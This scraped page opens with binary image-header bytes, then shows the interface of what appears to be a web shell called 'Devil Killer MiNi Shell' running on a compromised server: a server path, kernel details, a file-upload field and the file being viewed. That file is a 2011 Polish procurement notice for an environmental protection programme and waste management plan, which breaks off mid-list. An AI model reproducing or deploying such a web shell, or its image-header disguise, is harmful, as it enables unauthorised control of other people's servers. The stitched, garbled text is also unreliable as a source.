JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111103/287695-N-2011.html

<p class="kh_header"><b>Poznań: Opracowanie Programu ochrony środowiska województwa wielkopolskiego na lata 2012-2015 oraz Planu gospodarki odpadami dla województwa wielkopolskiego na lata 2012-2017.</b><br>
<b>Numer ogłoszenia: 287695 - 2011; data zamieszczenia: 03.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Marszałkowski Województwa Wielkopolskiego , Al. Niepodległości 18, 61-713 Poznań, woj. wielkopolskie, tel. 061 6475320, faks 061 8517562.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umww.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Programu ochrony środowiska województwa wielkopolskiego na lata 2012-2015 oraz Planu gospodarki odpadami dla województwa wielkopolskiego na lata 2012-2017..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie w wersji papierowej i elektronicznej Programu ochrony środowiska województwa wielkopolskiego na lata 2012 - 2015 oraz Planu gospodarki odpadami dla województwa wielkopolskiego na lata 2012 - 2017.

Szczegółowy opis przedmiotu zamówienia:

A. Program ochrony środowiska województwa wielkopolskiego na lata 2012 - 2015.

1. Opracowanie należy wykonać zgodnie z:
1.1. Strategią Rozwoju Kraju 2007-2015 przyjętą przez Radę Ministrów 29 listopada 2006 r. 
1.2. Narodowymi Strategicznymi Ramami Odniesienia 2007-2013 dokument zaakceptowany przez Komisję Europejską 9 maja 2007 r.
1.3. Polityką ekologiczną państwa w latach 2009-2012 z perspektywą do roku 2016 przyjętą uchwałą Sejmu RP z dnia 22 maja 2009 r. (M.P. z 2009 r. Nr 34, poz. 501).
1.4. Strategią Rozwoju Województwa Wielkopolskiego do 2020 roku przyjętą uchwałą nr XLII/692A/05 Sejmiku Województwa Wielkopolskiego z dnia 19 grudnia 2005 r.
1.5. Planem Zagospodarowania Przestrzennego Województwa Wielkopolskiego przyjętym uchwałą nr XLII/628/2001 SWW z dnia 26 listopada 2001 r., zmienionym uchwałą nr XLVI/690/10 SWW z dnia 26 kwietnia 2010 r.
1.6. Ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (tekst jednolity: Dz.U. z 2008 r. Nr 25, poz. 150 ze zm.) oraz ustawami związanymi i obligatoryjnymi, aktualnymi przepisami wykonawczymi do ww. ustaw.
1.7. Wytycznymi sporządzania programów ochrony środowiska na szczeblu regionalnym i lokalnym przygotowanymi przez Ministerstwo Środowiska (Warszawa, grudzień 2002 r.).

2. Przedmiot zamówienia musi składać się z następujących części:
2.1. Części opisowej zawierającej:
2.1.1. Aktualną ocenę stanu środowiska województwa wielkopolskiego w oparciu o dane z 2010 r. z uwzględnieniem między innymi:
2.1.1.1. jakości powietrza,
2.1.1.2. klimatu akustycznego,
2.1.1.3. pól elektromagnetycznych,
2.1.1.4. zasobów i jakości wód,
2.1.1.5. gospodarki wodno-ściekowej,
2.1.1.6. zasobów geologicznych,
2.1.1.7. zanieczyszczenia gleb,
2.1.1.8. zasobów przyrodniczych,
2.1.1.9. nadzwyczajnych zagrożeń środowiska w odniesieniu do poważnych awarii przemysłowych.
2.1.2. Wyznaczenia celów ekologicznych do roku 2023 wraz z wyznaczeniem kierunków działań, które mają prowadzić do osiągnięcia celów ekologicznych dla:
2.1.2.1. ochrony przyrody,
2.1.2.2. ochrony i zrównoważonego rozwoju lasów,
2.1.2.3. regionalnego gospodarowania zasobami wodnymi,
2.1.2.4. ochrony powierzchni ziemi,
2.1.2.5. gospodarowania zasobami geologicznymi,
2.1.2.6. jakości wód i gospodarki wodno-ściekowej,
2.1.2.7. jakości powietrza,
2.1.2.8. hałasu,
2.1.2.9. pól elektromagnetycznych,
2.1.2.10. poważnych awarii przemysłowych,
2.1.2.11. edukacji dla zrównoważonego rozwoju,
2.1.2.12. uwzględnienia zasad ochrony środowiska w strategiach sektorowych,
2.1.2.13. aspektów ekologicznych w planowaniu przestrzennym,
2.1.2.14. aktywizacji rynku na rzecz ochrony środowiska,
2.1.2.15. rozwoju badań i postępu technicznego,
2.1.2.16. odpowiedzialności za szkody w środowisku.
2.1.3. Opracowania strategii wdrożeniowej w latach 2012-2015:
2.1.3.1. Określenie priorytetów ekologicznych dla punktów 2.1.2.1. - 2.1.2.16.
2.1.3.2. Sporządzenie harmonogramu realizacji Programu w latach 2012-2015 oraz w latach 2016-2023 zawierającego nazwy przedsięwzięć, terminy realizacji, wysokość nakładów, źródła finansowania oraz jednostki odpowiedzialne za ich wykonanie.
2.1.4. Opracowanie zarządzania Programem, w tym:
2.1.4.1. Zarządzanie środowiskiem.
2.1.4.2. Struktura zarządzania Programem.
2.1.4.3. Monitoring wdrażania Programu.
2.1.4.4. Wskaźniki wdrażania Programu.
2.1.4.5. Harmonogram procesu wdrażania Programu. 
2.1.5. Określenie aspektów finansowych realizacji Programu:
2.1.5.1. Potrzeby finansowe na realizację Programu.
2.1.5.2. Analiza źródeł finansowania przedsięwzięć z zakresu ochrony środowiska. 
2.1.6. Przedstawienie wytycznych do aktualizacji powiatowych programów ochrony środowiska.
2.2. Części graficznej zawierającej między innymi mapy dotyczące:
2.2.1. Krajowych form ochrony przyrody (parki narodowe, parki krajobrazowe, obszary chronionego krajobrazu, rezerwaty przyrody i obszary Natura 2000).
2.2.2. Lesistości województwa według powiatów.
2.2.3. Głównych zbiorników wód podziemnych.
2.2.4. Lokalizacji zbiorników retencyjnych z rezerwą powodziową.
2.2.5. Zasobów kopalin województwa wielkopolskiego.
2.2.6. Monitoringu wód wrażliwych na zanieczyszczenia związkami azotu ze źródeł rolniczych w obszarach szczególnie wrażliwych.
2.2.7. Monitoringu wód podziemnych.
2.2.8. Oczyszczalni ścieków powyżej 2000 RLM.
2.2.9. Głównych emitorów zanieczyszczeń powietrza. 
2.2.10. Wyników oceny jakości powietrza pod kątem ochrony zdrowia i pod kątem ochrony roślin.
2.2.11. Wyników pomiarów hałasu komunikacyjnego.
2.2.12. Lokalizacji zakładów o dużym ryzyku i zakładów o zwiększonym ryzyku wystąpienia poważnych awarii.
2.3. Streszczenie w języku niespecjalistycznym.

 
B. Plan gospodarki odpadami dla województwa wielkopolskiego na lata 2012 - 2017.

1. Opracowanie należy wykonać zgodnie z:
1.1. Strategią Rozwoju Kraju 2007-2015 przyjętą przez Radę Ministrów 29 listopada 2006 r. 
1.2. Polityką ekologiczną państwa w latach 2009-2012 z perspektywą do roku 2016 przyjętą uchwałą Sejmu RP z dnia 22 maja 2009 r. (M.P. z 2009 r. Nr 34, poz. 501).
1.3. Uchwałą Nr 217 Rady Ministrów z dnia 24 grudnia 2010 r. w sprawie Krajowego planu gospodarki odpadami 2014 (M.P. z 2010 r. Nr 101, poz. 1183).
1.4. Strategią Rozwoju Województwa Wielkopolskiego do 2020 roku przyjętą uchwałą nr XLII/692A/05 Sejmiku Województwa Wielkopolskiego z dnia 19 grudnia 2005 r.
1.5. Planem Zagospodarowania Przestrzennego Województwa Wielkopolskiego przyjętym uchwałą nr XLII/628/2001 SWW z dnia 26 listopada 2001 r., zmienionym uchwałą nr XLVI/690/10 SWW z dnia 26 kwietnia 2010 r.
1.6. Przepisami ustawy z dnia 27 kwietnia 2001 r. o odpadach (tekst jednolity: Dz.U. z 2010 r. Nr 185 poz. 1243 ze zm.) w brzmieniu obowiązującym od dnia 1 stycznia 2012 r. - nadanym ustawą z dnia 1 lipca 2011 r. o zmianie ustawy o utrzymaniu czystości i porządku w gminach oraz niektórych innych ustaw (Dz.U. z 2011 r. Nr 152, poz. 897).
1.7. Rozporządzeniem Ministra Środowiska z dnia 9 kwietnia 2003 r. w sprawie sporządzania planów gospodarki odpadami (Dz.U. z 2003 r. Nr 66, poz. 620 ze zm.) w zakresie w jakim nie jest sprzeczne z ustawą, o której mowa w punkcie 1.6.

Plan gospodarki odpadami dla województwa wielkopolskiego na lata 2012-2017 dotyczy odpadów wytworzonych na obszarze, dla którego jest sporządzany oraz przywożonych na ten obszar, w tym: odpadów komunalnych, odpadów ulegających biodegradacji, odpadów opakowaniowych i odpadów niebezpiecznych oraz obejmuje również środki służące zapobieganiu powstawaniu odpadów.

2. Przedmiot zamówienia musi składać się z następujących części:
2.1. Części opisowej zawierającej:
2.1.1. Analizę aktualnego stanu gospodarki odpadami na obszarze województwa wielkopolskiego, w tym informacje dotyczące:
2.1.1.1. Rodzajów, ilości i źródeł powstawania odpadów.
2.1.1.2. Środków służących zapobieganiu powstawaniu odpadów i oceny ich użyteczności.
2.1.1.3. Rodzajów i ilości odpadów poddawanych poszczególnym procesom odzysku, w tym w instalacjach położonych poza terytorium kraju.
2.1.1.4. Rodzajów i ilości odpadów poddawanych poszczególnym procesom unieszkodliwiania, w tym w instalacjach położonych poza terytorium kraju.
2.1.1.5. Istniejących systemów gospodarowania odpadami, w tym zbierania odpadów.
2.1.1.6. Rodzajów, rozmieszczenia i mocy przerobowych instalacji do przetwarzania odpadów, w tym olejów odpadowych i innych odpadów niebezpiecznych.
2.1.1.7. Identyfikacji problemów w zakresie gospodarki odpadami, w tym, uwzględniając położenie geograficzne, sytuację demograficzną i gospodarczą, warunki glebowe, hydrogeologiczne i hydrologiczne, ocenę potrzeb:
a) tworzenia nowych lub zmiany istniejących systemów zbierania odpadów oraz budowy dodatkowej infrastruktury służącej gospodarowaniu odpadami, zgodnie z zasadą bliskości,
b) zamknięcia obiektów przeznaczonych do gospodarowania odpadami.
2.1.2. Prognozowane zmiany w zakresie gospodarki odpadami, w tym zmiany wynikające ze zmian demograficznych i gospodarczych.
2.1.3. Cele w zakresie gospodarki odpadami do roku 2023, wraz ze wskazaniem terminów ich osiągnięcia, w tym cele dotyczące zapobiegania powstawaniu odpadów i ograniczenia ilości odpadów komunalnych ulegających biodegradacji przekazywanych na składowiska odpadów.
2.1.4. Określenie kierunków działań w zakresie zapobiegania powstawaniu odpadów oraz kształtowania systemu gospodarki odpadami podejmowanych dla osiągnięcia celów do roku 2023, w tym:
2.1.4.1. Działań w zakresie gospodarki odpadami, wraz z określeniem planowanych technologii i metod postępowania.
2.1.4.2. Działań w zakresie postępowania z odpadami powodującymi problemy w zakresie gospodarki odpadami, w tym środków zachęcających do selektywnego zbierania bioodpadów w celu kompostowania oraz przetwarzania ich w sposób bezpieczny dla środowiska oraz życia i zdrowia ludzi.
2.1.4.3. Rozwiązań dotyczących postępowania z olejami odpadowymi i innymi odpadami niebezpiecznymi.
2.1.5. Określenie kryteriów rozmieszczenia obiektów przeznaczonych do gospodarowania odpadami oraz mocy przerobowych przyszłych instalacji do przetwarzania odpadów.
2.1.6. Harmonogram planowanych czynności oraz określenie wykonawców i sposobu finansowania zadań wynikających z przyjętych kierunków działań.
2.1.7. Określenie metody monitorowania działań w sposób umożliwiający ocenę stanu realizacji zadań określonych w planie gospodarki odpadami.
2.1.8. Określenie regionów gospodarki odpadami komunalnymi, wraz ze wskazaniem gmin wchodzących w skład regionu.
2.1.9. Wykaz regionalnych instalacji do przetwarzania odpadów komunalnych w poszczególnych regionach gospodarki odpadami komunalnymi oraz instalacji przewidzianych do zastępczej obsługi tych regionów, do czasu uruchomienia regionalnych instalacji do przetwarzania odpadów komunalnych, w przypadku gdy znajdująca się w nich instalacja uległa awarii lub nie może przyjmować odpadów z innych przyczyn.
2.1.10. Plan zamykania regionalnych instalacji do przetwarzania odpadów komunalnych niespełniających wymagań ochrony środowiska, których modernizacja nie jest możliwa z przyczyn technicznych lub nie jest uzasadniona z przyczyn ekonomicznych.
2.1.11. Informacje na temat organizacji działań związanych z gospodarowaniem odpadami, w tym opis podziału zadań pomiędzy podmioty publiczne i prywatne zajmujące się gospodarowaniem odpadami.
2.1.12. Informacje na temat oceny użyteczności i przydatności stosowania instrumentów ekonomicznych i innych instrumentów do rozwiązania problemów związanych z gospodarką odpadami, z uwzględnieniem potrzeby utrzymywania niezakłóconego funkcjonowania rynku wewnętrznego.
2.1.13 Informacje na temat kampanii informacyjnych i innych sposobów informowania społeczeństwa lub określonej grupy osób w zakresie gospodarki odpadami.
2.1.14. Informację o strategicznej ocenie oddziaływania planu gospodarki odpadami na środowisko. 
W przypadku przeprowadzania strategicznej oceny oddziaływania planu gospodarki odpadami na środowisko podsumowanie, o którym mowa w art. 55 ust. 3 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227, z późn. zm.), a w przypadku odstąpienia od jej przeprowadzenia - uzasadnienie, o którym mowa w art. 42 pkt 2 tej ustawy, stanowi załącznik do planu.
2.2. Części graficznej obejmującej wykresy, diagramy i mapy poglądowe województwa wielkopolskiego - w zakresie jakiego dotyczy tematyka danego punktu opracowania. 
2.3. Streszczenie w języku niespecjalistycznym.

III. Wykonawca przedmiotu zamówienia zobowiązany jest do:

1. Sporządzenia w ramach realizacji przedmiotu zamówienia i przedstawienia Dyrektorowi Departamentu Środowiska Urzędu Marszałkowskiego Województwa Wielkopolskiego w Poznaniu opracowania w celu wstępnej akceptacji wykonanego przedmiotu umowy (2 egzemplarze w wersji papierowej i 2 egzemplarze w wersji elektronicznej - na płytach CD lub DVD).

2. Uwzględnienia zgłoszonych przez Dyrektora Departamentu Środowiska uwag odnośnie zawartości opracowania i przyjmowanych kierunków rozwiązań i przedłożenia poprawionej wersji wykonanego przedmiotu umowy (2 egzemplarze w wersji papierowej i 2 egzemplarze w wersji elektronicznej - na płytach CD lub DVD).

3. Sporządzenia, w ramach realizacji II, III i IV etapu przedmiotu zamówienia, wersji zaakceptowanej przez Dyrektora Departamentu Środowiska, która zostanie przedłożona na posiedzeniu Zarządu Województwa Wielkopolskiego (14 egzemplarzy w wersji papierowej i 2 egzemplarze w wersji elektronicznej na płytach CD lub DVD) i Komisji Ochrony Środowiska i Gospodarki Wodnej Sejmiku Województwa Wielkopolskiego (4 egzemplarze w wersji papierowej i 2 egzemplarze w wersji elektronicznej na płytach CD lub DVD) oraz na sesji Sejmiku Województwa Wielkopolskiego (18 egzemplarzy w wersji papierowej i 2 egzemplarze w wersji elektronicznej na płytach CD lub DVD). Wykonawca dokona każdorazowo prezentacji opracowania (w wersji PowerPoint) na ww. posiedzeniach.

4. Każdorazowego wprowadzania zgłoszonych poprawek na każdym etapie zatwierdzania przedmiotu umowy i ponownego jego przedstawiania do akceptacji w ilościach określonych w pkt 2. niniejszego rozdziału.

5. Każdy z egzemplarzy, w wersji papierowej, o których mowa w pkt. 1.-3. należy wykonać: w formacie A4, format większy niż A4, należy złożyć do formatu A4, przy zastosowaniu czcionki Times New Roman 11, w wersji - pełny kolor, w druku jednostronnym i zbindować.

6. Dostarczenia przedmiotu umowy, po przyjęciu przez Sejmik Województwa Wielkopolskiego, w formie papierowej - w ilości 18 egzemplarzy oraz elektronicznej (płyty CD lub DVD) - 18 sztuk. 4 egzemplarze w wersji papierowej należy wykonać w formacie A4, format większy niż A4, należy złożyć do formatu A4, przy zastosowaniu czcionki Times New Roman 11, w wersji - pełny kolor, w druku jednostronnym, w sztywnej okładce, pozostałe 14 egzemplarzy należy wykonać zgodnie z opisem zawartym w pkt. 5.

 
7. Proces sporządzania opracowania obejmuje również: 
7.1. Udział przedstawiciela Wykonawcy w spotkaniach konsultacyjnych dotyczących Programu oraz Planu.
7.2. Analizę uwag i wniosków złożonych przez społeczeństwo. 
7.3. Odniesienie się do zgłoszonych uwag i wniosków, udział w procedurze oceny strategicznej w tym między innym przygotowanie projektów odpowiedzi na zapytania organów dokonujących strategicznej oceny..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.72.00.00-0, 90.70.00.00-4, 90.50.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 4500 zł (słownie: cztery tysiące pięćset złotych).
Wadium musi być wniesione przed upływem terminu składania ofert.
Wadium może być wniesione w jednej lub kilku następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b, ust. 5, pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity: Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.).

Wykonawca ma obowiązek wnieść wadium w jednej lub kilku z wybranych przez siebie wyżej wymienionych form.

Uwaga: dokument gwarancji, poręczeń winien zawierać wyszczególnione warunki zapłaty kwoty wadium Zamawiającemu (utraty wadium przez Wykonawcę na rzecz Zamawiającego), tj. gdy:
- Wykonawca, którego oferta została wybrana, odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe, z przyczyn leżących po stronie Wykonawcy;
- Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Wniesione wadium musi zabezpieczać ofertę Wykonawcy przez cały okres związania ofertą.

Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: 
PKO Bank Polski S.A I Oddział/Poznań, 
numer rachunku: 47 1020 4027 0000 1502 0400 8058.

W przypadku wniesienia wadium w pieniądzu, Zamawiający uzna, iż będzie ono wniesione skutecznie jedynie w przypadku wpływu pieniędzy na konto Zamawiającego przed upływem terminu składania ofert. Na poleceniu przelewu należy zamieścić adnotację: dotyczy przetargu - numer sprawy DSR.III.272.3.2011

Potwierdzeniem wniesienia wadium w formie innej niż pieniężna, jest oryginalny dokument banku, ubezpieczyciela lub poręczyciela, wystawiony na Województwo Wielkopolskie z siedzibą Urzędu Marszałkowskiego Województwa Wielkopolskiego w Poznaniu, Al. Niepodległości 18, 61-713 Poznań z oznaczeniem, iż dotyczy przetargu - numer sprawy DSR.III.272.3.2011 złożony w pokoju nr 415, pl. Wolności 18 w Poznaniu przed upływem terminu składania ofert.
Kopia wyżej wskazanego dokumentu, poświadczona za zgodność z oryginałem przez Wykonawcę, powinna być dołączona do oferty.

Wykonawca, którego oferta nie będzie zabezpieczona wadium zostanie wykluczony z postępowania.

Zamawiający dokona zwrotu wadium:
a) wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp;
b) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.

Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

W przypadkach określonych w art. 46 ust. 4 a oraz ust. 5 ustawy Pzp, Zamawiający zatrzymuje wadium wraz z odsetkami, tj. gdy:
a) Wykonawca, którego oferta została wybrana, odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn
leżących po stronie Wykonawcy;
c) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności  jest  krótszy - w tym okresie, co najmniej jednego z opracowań: programu ochrony środowiska o zasięgu co najmniej wojewódzkim lub planu gospodarki odpadami o zasięgu co najmniej wojewódzkim, na dowód czego Wykonawca zobowiązany będzie przedstawić dokument potwierdzający, że opracowanie to zostało wykonane lub jest wykonywane należycie.
Ocena powyższego warunku zostanie dokonana na podstawie kryterium spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedłożyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę co najmniej 50 000 zł (pięćdziesiąt tysięcy złotych), wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Ocena powyższego warunku zostanie dokonana na podstawie kryterium spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
